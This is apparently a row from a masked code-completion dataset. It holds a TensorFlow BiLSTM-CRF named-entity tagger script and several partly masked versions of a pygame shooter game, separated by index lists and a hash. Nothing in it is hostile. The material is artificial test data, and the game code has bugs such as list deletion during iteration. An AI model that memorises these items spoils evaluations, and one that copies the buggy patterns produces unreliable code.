log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(
logits, y_t, self.lengths)
self.cost = tf.reduce_mean(-log_likelihood)
self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate
).minimize(self.cost)
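        # CRF head: training maximizes the sequence log-likelihood above;
        # inference decodes the best tag path with Viterbi (crf_decode), and
        # the sequence mask keeps padded positions out of the accuracy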
mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen)
self.tags_seq, tags_score = tf.contrib.crf.crf_decode(logits,
transition_params, self.lengths)
self.tags_seq = tf.identity(self.tags_seq, name='logits')
y_t = tf.cast(y_t, tf.int32)
self.prediction = tf.boolean_mask(self.tags_seq, mask)
mask_label = tf.boolean_mask(y_t, mask)
correct_pred = tf.equal(self.prediction, mask_label)
correct_index = tf.cast(correct_pred, tf.float32)
self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
def parse(file):
"""
    Load the file and parse it.
    :param file: file name
    :return: tokens <-> tags
"""
with open(file) as fopen:
texts = fopen.read().split('\n')
left, right = [], []
for text in texts:
if '-DOCSTART' in text or not len(text):
continue
splitted = text.split()
left.append(splitted[0])
right.append(splitted[-1])
return left, right
def process_string(string):
"""
:param string:
:return:
"""
string = re.sub('[^A-Za-z0-9\\-\\/ ]+', ' ', string).split()
return ' '.join([to_title(y.strip()) for y in string])
def to_title(string):
if string.isupper():
string = string.title()
return string
def parse_XY(texts, labels):
"""
    Build the tag, word and character vocabularies and map the text to id sequences.
    :param texts: the text, as a list of tokens
    :param labels: a list of tags
    :return: token-id sequence, tag-id sequence
"""
global word2idx, tag2idx, char2idx, word_idx, tag_idx, char_idx
X, Y = [], []
for no, text in enumerate(texts):
text = text.lower()
tag = labels[no]
for c in text:
if c not in char2idx:
char2idx[c] = char_idx
char_idx += 1
if tag not in tag2idx:
tag2idx[tag] = tag_idx
tag_idx += 1
Y.append(tag2idx[tag])
if text not in word2idx:
word2idx[text] = word_idx
word_idx += 1
X.append(word2idx[text])
return X, np.array(Y)
def iter_seq(x):
return np.array([x[i:i + seq_len] for i in range(0, len(x) - seq_len, 1)])
def to_train_seq(*args):
"""
    :param args: token-id sequence and tag-id sequence
:return:
"""
return [iter_seq(x) for x in args]
def generate_char_seq(batch):
"""
    Input arrives as chunks of 50 tokens each (however many chunks there are);
    converts every word in each chunk into a character-id sequence.
:param batch:
:return:
"""
x = [[len(idx2word[i]) for i in k] for k in batch]
maxlen = max([j for i in x for j in i])
temp = np.zeros((batch.shape[0], batch.shape[1], maxlen), dtype=np.int32)
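    # characters are written starting from index -1, so each word is stored
    # reversed and right-aligned, left-padded with PAD (id 0)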
for i in range(batch.shape[0]):
for k in range(batch.shape[1]):
for no, c in enumerate(idx2word[batch[i, k]]):
temp[i, k, -1 - no] = char2idx[c]
return temp
def pred2label(pred):
out = []
for pred_i in pred:
out_i = []
for p in pred_i:
out_i.append(idx2tag[p])
out.append(out_i)
return out
if __name__ == '__main__':
left_train, right_train = parse('./data/eng.train')
left_test, right_test = parse('./data/eng.testa')
word2idx = {'PAD': 0, 'NUM': 1, 'UNK': 2}
tag2idx = {'PAD': 0}
char2idx = {'PAD': 0}
word_idx = 3
tag_idx = 1
char_idx = 1
train_X, train_Y = parse_XY(left_train, right_train)
test_X, test_Y = parse_XY(left_test, right_test)
idx2word = {idx: tag for tag, idx in word2idx.items()}
idx2tag = {i: w for w, i in tag2idx.items()}
seq_len = 50
X_seq, Y_seq = to_train_seq(train_X, train_Y)
X_char_seq = generate_char_seq(X_seq)
print(X_seq.shape)
print(X_char_seq.shape)
X_seq_test, Y_seq_test = to_train_seq(test_X, test_Y)
X_char_seq_test = generate_char_seq(X_seq_test)
print(X_seq_test.shape)
print(X_char_seq_test.shape)
train_X, train_Y, train_char = X_seq, Y_seq, X_char_seq
test_X, test_Y, test_char = X_seq_test, Y_seq_test, X_char_seq_test
tf.reset_default_graph()
sess = tf.Session()
dim_word = 64
dim_char = 128
dropout = 0.8
learning_rate = 0.001
hidden_size_char = 128
hidden_size_word = 128
num_layers = 2
batch_size = 32
model = Model(dim_word, dim_char, dropout, learning_rate,
hidden_size_char, hidden_size_word, num_layers)
sess.run(tf.global_variables_initializer())
for e in range(3):
train_acc, train_loss, test_acc, test_loss = 0, 0, 0, 0
for i in range(0, len(train_X), batch_size):
batch_x = train_X[i:min(i + batch_size, train_X.shape[0])]
batch_char = train_char[i:min(i + batch_size, train_X.shape[0])]
batch_y = train_Y[i:min(i + batch_size, train_X.shape[0])]
acc, cost, _ = sess.run([model.accuracy, model.cost, model.
optimizer], feed_dict={model.word_ids: batch_x, model.
char_ids: batch_char, model.labels: batch_y})
train_loss += cost
train_acc += acc
print('train_data: epoch:{}, step:{}, loss:{}, accuracy:{}'.
format(e, i // batch_size + 1, cost, acc))
for i in range(0, len(test_X), batch_size):
batch_x = test_X[i:min(i + batch_size, test_X.shape[0])]
batch_char = test_char[i:min(i + batch_size, test_X.shape[0])]
batch_y = test_Y[i:min(i + batch_size, test_X.shape[0])]
acc, cost = sess.run([model.accuracy, model.cost], feed_dict={
model.word_ids: batch_x, model.char_ids: batch_char, model.
labels: batch_y})
test_loss += cost
test_acc += acc
print('test_data: epoch:{}, step:{}, loss:{}, accuracy:{}'.
format(e, i // batch_size + 1, cost, acc))
train_loss /= len(train_X) / batch_size
train_acc /= len(train_X) / batch_size
test_loss /= len(test_X) / batch_size
test_acc /= len(test_X) / batch_size
print(
'epoch: %d, training loss: %f, training acc: %f, valid loss: %f, valid acc: %f\n'
% (e, train_loss, train_acc, test_loss, test_acc))
real_Y, predict_Y = [], []
for i in range(0, len(test_X), batch_size):
batch_x = test_X[i:min(i + batch_size, test_X.shape[0])]
batch_char = test_char[i:min(i + batch_size, test_X.shape[0])]
batch_y = test_Y[i:min(i + batch_size, test_X.shape[0])]
predicted = pred2label(sess.run(model.tags_seq, feed_dict={model.
word_ids: batch_x, model.char_ids: batch_char}))
real = pred2label(batch_y)
predict_Y.extend(predicted)
real_Y.extend(real)
print(classification_report(np.array(real_Y).ravel(), np.array(
predict_Y).ravel()))
| """
@file : 001-rnn+lstm+crf.py
@author: xiaolu
@time : 2019-09-06
"""
import re
import numpy as np
import tensorflow as tf
from sklearn.metrics import classification_report
class Model:
def __init__(self, dim_word, dim_char, dropout, learning_rate,
hidden_size_char, hidden_size_word, num_layers):
'''
        :param dim_word: word embedding dimension
        :param dim_char: character embedding dimension
        :param dropout: dropout (used as the LSTM output keep probability)
        :param learning_rate: learning rate
        :param hidden_size_char: hidden size of the character-level BiLSTM
        :param hidden_size_word: hidden size of the word-level BiLSTM
        :param num_layers: number of stacked BiLSTM layers
'''
def cells(size, reuse=False):
return tf.contrib.rnn.DropoutWrapper(
tf.nn.rnn_cell.LSTMCell(size, initializer=tf.orthogonal_initializer(), reuse=reuse),
output_keep_prob=dropout
)
# 1. define input
self.word_ids = tf.placeholder(tf.int32, shape=[None, None])
self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None])
self.labels = tf.placeholder(tf.int32, shape=[None, None])
self.maxlen = tf.shape(self.word_ids)[1]
self.lengths = tf.count_nonzero(self.word_ids, 1)
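        # sequence lengths inferred from non-zero word ids (PAD has id 0)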
# 2. embedding
self.word_embeddings = tf.Variable(tf.truncated_normal([len(word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word)))
self.char_embeddings = tf.Variable(tf.truncated_normal([len(char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char)))
word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.word_ids)
char_embedded = tf.nn.embedding_lookup(self.char_embeddings, self.char_ids)
s = tf.shape(char_embedded) # (51312, 50, 27, embedding_size)
char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2], dim_char])
for n in range(num_layers):
(out_fw, out_bw), (state_fw, state_bw) = tf.nn.bidirectional_dynamic_rnn(
cell_fw=cells(hidden_size_char),
cell_bw=cells(hidden_size_char),
inputs=char_embedded,
dtype=tf.float32,
scope='bidirectional_rnn_char_%d' % n
)
char_embedded = tf.concat((out_fw, out_bw), 2)
output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2*hidden_size_char])
        word_embedded = tf.concat([word_embedded, output], axis=-1) # concatenate word embeddings with the char-BiLSTM output features
for n in range(num_layers):
(out_fw, out_bw), (state_fw, state_bw) = tf.nn.bidirectional_dynamic_rnn(
cell_fw=cells(hidden_size_word),
cell_bw=cells(hidden_size_word),
inputs=word_embedded,
dtype=tf.float32,
scope='bidirectional_rnn_word_%d' % n
)
word_embedded = tf.concat((out_fw, out_bw), 2)
        logits = tf.layers.dense(word_embedded, len(idx2tag))
y_t = self.labels
log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(
logits, y_t, self.lengths
)
self.cost = tf.reduce_mean(-log_likelihood)
self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(self.cost)
mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen)
self.tags_seq, tags_score = tf.contrib.crf.crf_decode(
logits, transition_params, self.lengths
)
self.tags_seq = tf.identity(self.tags_seq, name='logits')
y_t = tf.cast(y_t, tf.int32)
self.prediction = tf.boolean_mask(self.tags_seq, mask)
mask_label = tf.boolean_mask(y_t, mask)
correct_pred = tf.equal(self.prediction, mask_label)
correct_index = tf.cast(correct_pred, tf.float32)
self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
def parse(file):
'''
    Load the file and parse it.
    :param file: file name
    :return: tokens <-> tags
'''
with open(file) as fopen:
texts = fopen.read().split('\n')
left, right = [], []
for text in texts:
if '-DOCSTART' in text or not len(text):
continue
splitted = text.split()
left.append(splitted[0])
right.append(splitted[-1])
return left, right
def process_string(string):
'''
    :param string: raw text
    :return: cleaned text with all-caps tokens title-cased
'''
    string = re.sub('[^A-Za-z0-9\-\/ ]+', ' ', string).split()
return ' '.join([to_title(y.strip()) for y in string])
def to_title(string):
if string.isupper():
string = string.title()
return string
def parse_XY(texts, labels):
'''
    Build the tag, word and character vocabularies and map the text to id sequences.
    :param texts: the text, as a list of tokens
    :param labels: a list of tags
    :return: token-id sequence, tag-id sequence
'''
global word2idx, tag2idx, char2idx, word_idx, tag_idx, char_idx
X, Y = [], []
for no, text in enumerate(texts):
        text = text.lower() # lowercase the current token
        tag = labels[no] # its corresponding tag
        for c in text: # character vocabulary
            if c not in char2idx:
                char2idx[c] = char_idx
                char_idx += 1
        if tag not in tag2idx: # tag vocabulary
            tag2idx[tag] = tag_idx
            tag_idx += 1
        Y.append(tag2idx[tag]) # tag id of the current token
        if text not in word2idx: # word vocabulary
            word2idx[text] = word_idx
            word_idx += 1
        X.append(word2idx[text]) # token id
return X, np.array(Y)
def iter_seq(x):
return np.array([x[i: i+seq_len] for i in range(0, len(x)-seq_len, 1)])
def to_train_seq(*args):
'''
    :param args: token-id sequence and tag-id sequence
:return:
'''
return [iter_seq(x) for x in args]
def generate_char_seq(batch):
'''
    Input arrives as chunks of 50 tokens each (however many chunks there are);
    converts every word in each chunk into a character-id sequence.
:param batch:
:return:
'''
    x = [[len(idx2word[i]) for i in k] for k in batch] # length of every word
    maxlen = max([j for i in x for j in i]) # longest word length
temp = np.zeros((batch.shape[0], batch.shape[1], maxlen), dtype=np.int32)
for i in range(batch.shape[0]):
for k in range(batch.shape[1]):
for no, c in enumerate(idx2word[batch[i, k]]):
temp[i, k, -1-no] = char2idx[c]
    return temp # [num_chunks, words_per_chunk, maxlen] (per-word char ids)
def pred2label(pred):
    # convert predicted tag ids back to tag strings
out = []
for pred_i in pred:
out_i = []
for p in pred_i:
out_i.append(idx2tag[p])
out.append(out_i)
return out
if __name__ == '__main__':
left_train, right_train = parse('./data/eng.train')
left_test, right_test = parse('./data/eng.testa')
# print(left_train[:10])
# print(right_train[:10])
    word2idx = {'PAD': 0, 'NUM': 1, 'UNK': 2} # word vocabulary
    tag2idx = {'PAD': 0} # tag vocabulary
char2idx = {'PAD': 0}
word_idx = 3
tag_idx = 1
char_idx = 1
train_X, train_Y = parse_XY(left_train, right_train)
test_X, test_Y = parse_XY(left_test, right_test)
# print(train_X[:20])
# print(train_Y[:20])
idx2word = {idx: tag for tag, idx in word2idx.items()}
idx2tag = {i: w for w, i in tag2idx.items()}
seq_len = 50
    X_seq, Y_seq = to_train_seq(train_X, train_Y) # sliding windows of 50 tokens each
X_char_seq = generate_char_seq(X_seq)
print(X_seq.shape) # (203571, 50)
print(X_char_seq.shape) # (203571, 50, 61)
X_seq_test, Y_seq_test = to_train_seq(test_X, test_Y)
X_char_seq_test = generate_char_seq(X_seq_test)
print(X_seq_test.shape) # (51312, 50)
print(X_char_seq_test.shape) # (51312, 50, 27)
train_X, train_Y, train_char = X_seq, Y_seq, X_char_seq
test_X, test_Y, test_char = X_seq_test, Y_seq_test, X_char_seq_test
tf.reset_default_graph()
sess = tf.Session()
dim_word = 64
dim_char = 128
dropout = 0.8
learning_rate = 1e-3
hidden_size_char = 128
hidden_size_word = 128
num_layers = 2
batch_size = 32
model = Model(dim_word, dim_char, dropout, learning_rate,
hidden_size_char, hidden_size_word, num_layers)
sess.run(tf.global_variables_initializer())
for e in range(3):
train_acc, train_loss, test_acc, test_loss = 0, 0, 0, 0
for i in range(0, len(train_X), batch_size):
batch_x = train_X[i: min(i + batch_size, train_X.shape[0])]
batch_char = train_char[i: min(i + batch_size, train_X.shape[0])]
batch_y = train_Y[i: min(i + batch_size, train_X.shape[0])]
acc, cost, _ = sess.run(
[model.accuracy, model.cost, model.optimizer],
feed_dict={
model.word_ids: batch_x,
model.char_ids: batch_char,
model.labels: batch_y
},
)
train_loss += cost
train_acc += acc
print('train_data: epoch:{}, step:{}, loss:{}, accuracy:{}'.format(e, i//batch_size+1, cost, acc))
for i in range(0, len(test_X), batch_size):
batch_x = test_X[i: min(i + batch_size, test_X.shape[0])]
batch_char = test_char[i: min(i + batch_size, test_X.shape[0])]
batch_y = test_Y[i: min(i + batch_size, test_X.shape[0])]
acc, cost = sess.run(
[model.accuracy, model.cost],
feed_dict={
model.word_ids: batch_x,
model.char_ids: batch_char,
model.labels: batch_y
},
)
test_loss += cost
test_acc += acc
print('test_data: epoch:{}, step:{}, loss:{}, accuracy:{}'.format(e, i//batch_size+1, cost, acc))
train_loss /= len(train_X) / batch_size
train_acc /= len(train_X) / batch_size
test_loss /= len(test_X) / batch_size
test_acc /= len(test_X) / batch_size
print('epoch: %d, training loss: %f, training acc: %f, valid loss: %f, valid acc: %f\n'
% (e, train_loss, train_acc, test_loss, test_acc))
real_Y, predict_Y = [], []
for i in range(0, len(test_X), batch_size):
batch_x = test_X[i: min(i + batch_size, test_X.shape[0])]
batch_char = test_char[i: min(i + batch_size, test_X.shape[0])]
batch_y = test_Y[i: min(i + batch_size, test_X.shape[0])]
predicted = pred2label(
sess.run(model.tags_seq,
feed_dict={
model.word_ids: batch_x,
model.char_ids: batch_char,
},
)
)
real = pred2label(batch_y)
predict_Y.extend(predicted)
real_Y.extend(real)
print(classification_report(np.array(real_Y).ravel(), np.array(predict_Y).ravel())) | [
7,
8,
10,
12,
13
] |
11 | 54e04d740ef46fca04cf4169d2e7c05083414bd8 | <mask token>
class Player:
<mask token>
<mask token>
<mask token>
class Bullet:
def __init__(self, color):
self.x = 0
self.y = 0
self.angle = 0
self.color = color
def draw(self):
pygame.draw.rect(scr, self.color, pygame.Rect(self.x, self.y, 5, 5))
class Gun:
def __init__(self):
self.x = 0
self.y = 0
self.bullets = []
self.bullets2 = []
def shoot1(self, x, y, angle):
self.bullets.append(Bullet((0, 255, 255)))
self.bullets[-1].x = x
self.bullets[-1].y = y
self.bullets[-1].angle = angle
def shoot2(self, x, y, angle):
self.bullets2.append(Bullet((255, 255, 0)))
self.bullets2[-1].x = x
self.bullets2[-1].y = y
self.bullets2[-1].angle = angle
class Enemy:
def __init__(self):
self.x = 100
self.y = 100
self.speed = 2
self.hearts = 3
self.image = pygame.image.load('enemy.png')
def draw(self):
scr.blit(self.image, (self.x, self.y))
def rotate(self, x, y):
oppos = math.fabs(y - self.y)
adjac = math.fabs(x - self.x)
hypot = math.hypot(oppos, adjac)
sin = oppos / hypot
radians = math.asin(sin)
angle = radians * (180 / 3.14)
if x > self.x:
if y > self.y:
angle -= angle + angle
if x < self.x:
angle = 180 + (angle - (angle + angle))
if y > self.y:
angle -= angle + angle
return angle - 90
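    # editor's note (equivalent shortcut, not in the original): the branching
    # above reduces to math.degrees(math.atan2(self.y - y, x - self.x)) - 90,
    # which also covers the x == self.x case with the target straight below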
def distance(self, x, y):
oppos = math.fabs(y - self.y)
adjac = math.fabs(x - self.x)
hypot = math.hypot(oppos, adjac)
return hypot
def spawn(self):
enemies.append(Enemy())
enemies[-1].x = random.randint(0, 600)
enemies[-1].y = random.randint(0, 600)
<mask token>
| <mask token>
class Player:
<mask token>
def draw(self):
scr.blit(self.image, (self.x, self.y))
<mask token>
class Bullet:
def __init__(self, color):
self.x = 0
self.y = 0
self.angle = 0
self.color = color
def draw(self):
pygame.draw.rect(scr, self.color, pygame.Rect(self.x, self.y, 5, 5))
class Gun:
def __init__(self):
self.x = 0
self.y = 0
self.bullets = []
self.bullets2 = []
def shoot1(self, x, y, angle):
self.bullets.append(Bullet((0, 255, 255)))
self.bullets[-1].x = x
self.bullets[-1].y = y
self.bullets[-1].angle = angle
def shoot2(self, x, y, angle):
self.bullets2.append(Bullet((255, 255, 0)))
self.bullets2[-1].x = x
self.bullets2[-1].y = y
self.bullets2[-1].angle = angle
class Enemy:
def __init__(self):
self.x = 100
self.y = 100
self.speed = 2
self.hearts = 3
self.image = pygame.image.load('enemy.png')
def draw(self):
scr.blit(self.image, (self.x, self.y))
def rotate(self, x, y):
oppos = math.fabs(y - self.y)
adjac = math.fabs(x - self.x)
hypot = math.hypot(oppos, adjac)
sin = oppos / hypot
radians = math.asin(sin)
angle = radians * (180 / 3.14)
if x > self.x:
if y > self.y:
angle -= angle + angle
if x < self.x:
angle = 180 + (angle - (angle + angle))
if y > self.y:
angle -= angle + angle
return angle - 90
def distance(self, x, y):
oppos = math.fabs(y - self.y)
adjac = math.fabs(x - self.x)
hypot = math.hypot(oppos, adjac)
return hypot
def spawn(self):
enemies.append(Enemy())
enemies[-1].x = random.randint(0, 600)
enemies[-1].y = random.randint(0, 600)
<mask token>
| <mask token>
pygame.init()
<mask token>
class Player:
def __init__(self):
self.x = 275
self.y = 275
self.image = pygame.image.load('player.jpg')
self.image1 = pygame.image.load('hearts.png')
self.lives = 5
def draw(self):
scr.blit(self.image, (self.x, self.y))
def rotate(self, x, y):
oppos = math.fabs(y - self.y)
adjac = math.fabs(x - self.x)
hypot = math.hypot(oppos, adjac)
sin = oppos / hypot
radians = math.asin(sin)
angle = radians * (180 / 3.14)
if x > self.x:
if y > self.y:
angle -= angle + angle
if x < self.x:
angle = 180 + (angle - (angle + angle))
if y > self.y:
angle -= angle + angle
return angle - 90
class Bullet:
def __init__(self, color):
self.x = 0
self.y = 0
self.angle = 0
self.color = color
def draw(self):
pygame.draw.rect(scr, self.color, pygame.Rect(self.x, self.y, 5, 5))
class Gun:
def __init__(self):
self.x = 0
self.y = 0
self.bullets = []
self.bullets2 = []
def shoot1(self, x, y, angle):
self.bullets.append(Bullet((0, 255, 255)))
self.bullets[-1].x = x
self.bullets[-1].y = y
self.bullets[-1].angle = angle
def shoot2(self, x, y, angle):
self.bullets2.append(Bullet((255, 255, 0)))
self.bullets2[-1].x = x
self.bullets2[-1].y = y
self.bullets2[-1].angle = angle
class Enemy:
def __init__(self):
self.x = 100
self.y = 100
self.speed = 2
self.hearts = 3
self.image = pygame.image.load('enemy.png')
def draw(self):
scr.blit(self.image, (self.x, self.y))
def rotate(self, x, y):
oppos = math.fabs(y - self.y)
adjac = math.fabs(x - self.x)
hypot = math.hypot(oppos, adjac)
sin = oppos / hypot
radians = math.asin(sin)
angle = radians * (180 / 3.14)
if x > self.x:
if y > self.y:
angle -= angle + angle
if x < self.x:
angle = 180 + (angle - (angle + angle))
if y > self.y:
angle -= angle + angle
return angle - 90
def distance(self, x, y):
oppos = math.fabs(y - self.y)
adjac = math.fabs(x - self.x)
hypot = math.hypot(oppos, adjac)
return hypot
def spawn(self):
enemies.append(Enemy())
enemies[-1].x = random.randint(0, 600)
enemies[-1].y = random.randint(0, 600)
<mask token>
cmd.spawn()
cmd.spawn()
<mask token>
while True:
frames += 1
scr.fill((0, 0, 0))
for event in pygame.event.get():
key = pygame.key.get_pressed()
Mpos = pygame.mouse.get_pos()
if event.type == 5:
gun.shoot1(player.x + 12.5, player.y + 12.5, angle)
for i in range(0, player.lives):
scr.blit(player.image1, (i * 35, 1))
for i in range(len(gun.bullets)):
try:
gun.bullets[i].x = gun.bullets[i].x + 4 * math.cos(math.radians
(gun.bullets[i].angle + 90))
gun.bullets[i].y = gun.bullets[i].y + 4 * math.sin(math.radians
(gun.bullets[i].angle - 90))
if gun.bullets[i].x > 600:
del gun.bullets[i]
if gun.bullets[i].x < 0:
del gun.bullets[i]
if gun.bullets[i].y > 600:
del gun.bullets[i]
if gun.bullets[i].y < 0:
del gun.bullets[i]
gun.bullets[i].draw()
except IndexError:
pass
for i in range(len(gun.bullets2)):
try:
gun.bullets2[i].x = gun.bullets2[i].x + 4 * math.cos(math.
radians(gun.bullets2[i].angle + 90))
gun.bullets2[i].y = gun.bullets2[i].y + 4 * math.sin(math.
radians(gun.bullets2[i].angle - 90))
if gun.bullets2[i].x > 600:
del gun.bullets2[i]
if gun.bullets2[i].x < 0:
del gun.bullets2[i]
if gun.bullets2[i].y > 600:
del gun.bullets2[i]
if gun.bullets2[i].y < 0:
del gun.bullets2[i]
gun.bullets2[i].draw()
except IndexError:
pass
for i in range(len(enemies)):
if enemies[i].distance(player.x, player.y) > 100:
enemies[i].x = enemies[i].x + enemies[i].speed * math.cos(math.
radians(enemies[i].rotate(player.x, player.y) + 90))
enemies[i].y = enemies[i].y + enemies[i].speed * math.sin(math.
radians(enemies[i].rotate(player.x, player.y) - 90))
enemies[i].image = pygame.image.load('enemy.png').convert()
enemies[i].image = enemies[i].image.copy()
enemies[i].image = pygame.transform.rotate(enemies[i].image,
enemies[i].rotate(player.x, player.y))
angle2 = enemies[i].rotate(player.x, player.y)
if frames % 100 == 0:
gun.shoot2(enemies[i].x + 12.5, enemies[i].y + 12.5, angle2)
enemies[i].draw()
for j in range(len(gun.bullets)):
        for i in range(len(enemies)):
try:
if gun.bullets[j].x > enemies[i].x and gun.bullets[j
].x < enemies[i].x + 25 and gun.bullets[j].y > enemies[i
].y and gun.bullets[j].y < enemies[i].y + 25:
del enemies[i]
except IndexError:
pass
for j in range(len(gun.bullets2)):
for i in range(len(gun.bullets2)):
try:
if gun.bullets2[j].x > player.x and gun.bullets2[j
].x < player.x + 25 and gun.bullets2[j
].y > player.y and gun.bullets2[j].y < player.y + 25:
for i in range(len(hit) - 1):
if not (hit[i].x > player.x or hit[i].x < player.x +
25 or hit[i].y > player.y or hit[i].y < player.y):
del hit[i]
if hit.count(gun.bullets2[j]) == 0:
hit.append(gun.bullets2[j])
player.lives = 5 - len(hit)
except IndexError:
pass
if key[pygame.K_a]:
player.x -= 3
if key[pygame.K_d]:
player.x += 3
if key[pygame.K_w]:
player.y -= 3
if key[pygame.K_s]:
player.y += 3
if frames % 150 == 0:
cmd.spawn()
if player.lives < 1:
pygame.quit()
break
player.image = pygame.image.load('player.jpg').convert()
player.image = player.image.copy()
player.image = pygame.transform.rotate(player.image, player.rotate(Mpos
[0], Mpos[1]))
angle = player.rotate(Mpos[0], Mpos[1])
player.draw()
pygame.display.update()
time.sleep(0.005)
quit()
| <mask token>
pygame.init()
scr = pygame.display.set_mode((700, 700))
enemies = []
hit = []
class Player:
def __init__(self):
self.x = 275
self.y = 275
self.image = pygame.image.load('player.jpg')
self.image1 = pygame.image.load('hearts.png')
self.lives = 5
def draw(self):
scr.blit(self.image, (self.x, self.y))
def rotate(self, x, y):
oppos = math.fabs(y - self.y)
adjac = math.fabs(x - self.x)
hypot = math.hypot(oppos, adjac)
sin = oppos / hypot
radians = math.asin(sin)
angle = radians * (180 / 3.14)
if x > self.x:
if y > self.y:
angle -= angle + angle
if x < self.x:
angle = 180 + (angle - (angle + angle))
if y > self.y:
angle -= angle + angle
return angle - 90
class Bullet:
def __init__(self, color):
self.x = 0
self.y = 0
self.angle = 0
self.color = color
def draw(self):
pygame.draw.rect(scr, self.color, pygame.Rect(self.x, self.y, 5, 5))
class Gun:
def __init__(self):
self.x = 0
self.y = 0
self.bullets = []
self.bullets2 = []
def shoot1(self, x, y, angle):
self.bullets.append(Bullet((0, 255, 255)))
self.bullets[-1].x = x
self.bullets[-1].y = y
self.bullets[-1].angle = angle
def shoot2(self, x, y, angle):
self.bullets2.append(Bullet((255, 255, 0)))
self.bullets2[-1].x = x
self.bullets2[-1].y = y
self.bullets2[-1].angle = angle
class Enemy:
def __init__(self):
self.x = 100
self.y = 100
self.speed = 2
self.hearts = 3
self.image = pygame.image.load('enemy.png')
def draw(self):
scr.blit(self.image, (self.x, self.y))
def rotate(self, x, y):
oppos = math.fabs(y - self.y)
adjac = math.fabs(x - self.x)
hypot = math.hypot(oppos, adjac)
sin = oppos / hypot
radians = math.asin(sin)
angle = radians * (180 / 3.14)
if x > self.x:
if y > self.y:
angle -= angle + angle
if x < self.x:
angle = 180 + (angle - (angle + angle))
if y > self.y:
angle -= angle + angle
return angle - 90
def distance(self, x, y):
oppos = math.fabs(y - self.y)
adjac = math.fabs(x - self.x)
hypot = math.hypot(oppos, adjac)
return hypot
def spawn(self):
enemies.append(Enemy())
enemies[-1].x = random.randint(0, 600)
enemies[-1].y = random.randint(0, 600)
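    # note: spawn() appends to the module-level `enemies` list, so all Enemy
    # instances share a single global population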
cmd = Enemy()
gun = Gun()
player = Player()
cmd.spawn()
cmd.spawn()
last = 0
frames = 0
fro = 1
angle = 0  # default facing, so a click during the very first event poll cannot hit an undefined name
while True:
frames += 1
scr.fill((0, 0, 0))
for event in pygame.event.get():
key = pygame.key.get_pressed()
Mpos = pygame.mouse.get_pos()
if event.type == 5:
gun.shoot1(player.x + 12.5, player.y + 12.5, angle)
for i in range(0, player.lives):
scr.blit(player.image1, (i * 35, 1))
for i in range(len(gun.bullets)):
try:
gun.bullets[i].x = gun.bullets[i].x + 4 * math.cos(math.radians
(gun.bullets[i].angle + 90))
gun.bullets[i].y = gun.bullets[i].y + 4 * math.sin(math.radians
(gun.bullets[i].angle - 90))
if gun.bullets[i].x > 600:
del gun.bullets[i]
if gun.bullets[i].x < 0:
del gun.bullets[i]
if gun.bullets[i].y > 600:
del gun.bullets[i]
if gun.bullets[i].y < 0:
del gun.bullets[i]
gun.bullets[i].draw()
except IndexError:
pass
for i in range(len(gun.bullets2)):
try:
gun.bullets2[i].x = gun.bullets2[i].x + 4 * math.cos(math.
radians(gun.bullets2[i].angle + 90))
gun.bullets2[i].y = gun.bullets2[i].y + 4 * math.sin(math.
radians(gun.bullets2[i].angle - 90))
if gun.bullets2[i].x > 600:
del gun.bullets2[i]
if gun.bullets2[i].x < 0:
del gun.bullets2[i]
if gun.bullets2[i].y > 600:
del gun.bullets2[i]
if gun.bullets2[i].y < 0:
del gun.bullets2[i]
gun.bullets2[i].draw()
except IndexError:
pass
for i in range(len(enemies)):
if enemies[i].distance(player.x, player.y) > 100:
enemies[i].x = enemies[i].x + enemies[i].speed * math.cos(math.
radians(enemies[i].rotate(player.x, player.y) + 90))
enemies[i].y = enemies[i].y + enemies[i].speed * math.sin(math.
radians(enemies[i].rotate(player.x, player.y) - 90))
enemies[i].image = pygame.image.load('enemy.png').convert()
enemies[i].image = enemies[i].image.copy()
enemies[i].image = pygame.transform.rotate(enemies[i].image,
enemies[i].rotate(player.x, player.y))
angle2 = enemies[i].rotate(player.x, player.y)
if frames % 100 == 0:
gun.shoot2(enemies[i].x + 12.5, enemies[i].y + 12.5, angle2)
enemies[i].draw()
for j in range(len(gun.bullets)):
        for i in range(len(enemies)):
try:
if gun.bullets[j].x > enemies[i].x and gun.bullets[j
].x < enemies[i].x + 25 and gun.bullets[j].y > enemies[i
].y and gun.bullets[j].y < enemies[i].y + 25:
del enemies[i]
except IndexError:
pass
for j in range(len(gun.bullets2)):
for i in range(len(gun.bullets2)):
try:
if gun.bullets2[j].x > player.x and gun.bullets2[j
].x < player.x + 25 and gun.bullets2[j
].y > player.y and gun.bullets2[j].y < player.y + 25:
for i in range(len(hit) - 1):
if not (hit[i].x > player.x or hit[i].x < player.x +
25 or hit[i].y > player.y or hit[i].y < player.y):
del hit[i]
if hit.count(gun.bullets2[j]) == 0:
hit.append(gun.bullets2[j])
player.lives = 5 - len(hit)
except IndexError:
pass
if key[pygame.K_a]:
player.x -= 3
if key[pygame.K_d]:
player.x += 3
if key[pygame.K_w]:
player.y -= 3
if key[pygame.K_s]:
player.y += 3
if frames % 150 == 0:
cmd.spawn()
if player.lives < 1:
pygame.quit()
break
player.image = pygame.image.load('player.jpg').convert()
player.image = player.image.copy()
player.image = pygame.transform.rotate(player.image, player.rotate(Mpos
[0], Mpos[1]))
angle = player.rotate(Mpos[0], Mpos[1])
player.draw()
pygame.display.update()
time.sleep(0.005)
quit()
| import random
import math
import time
import pygame
pygame.init()
scr = pygame.display.set_mode((700,700))
enemies = []
#music = pygame.mixer.music.load('ENERGETIC CHIPTUNE Thermal - Evan King.mp3')
#pygame.mixer.music.play(-1)
hit = []
class Player:
def __init__(self):
self.x = 275
self.y = 275
self.image = pygame.image.load('player.jpg')
self.image1 = pygame.image.load('hearts.png')
self.lives = 5
def draw(self):
scr.blit(self.image,(self.x,self.y))
def rotate(self, x, y):
oppos = math.fabs(y - self.y)
adjac = math.fabs(x - self.x)
hypot = math.hypot(oppos,adjac)
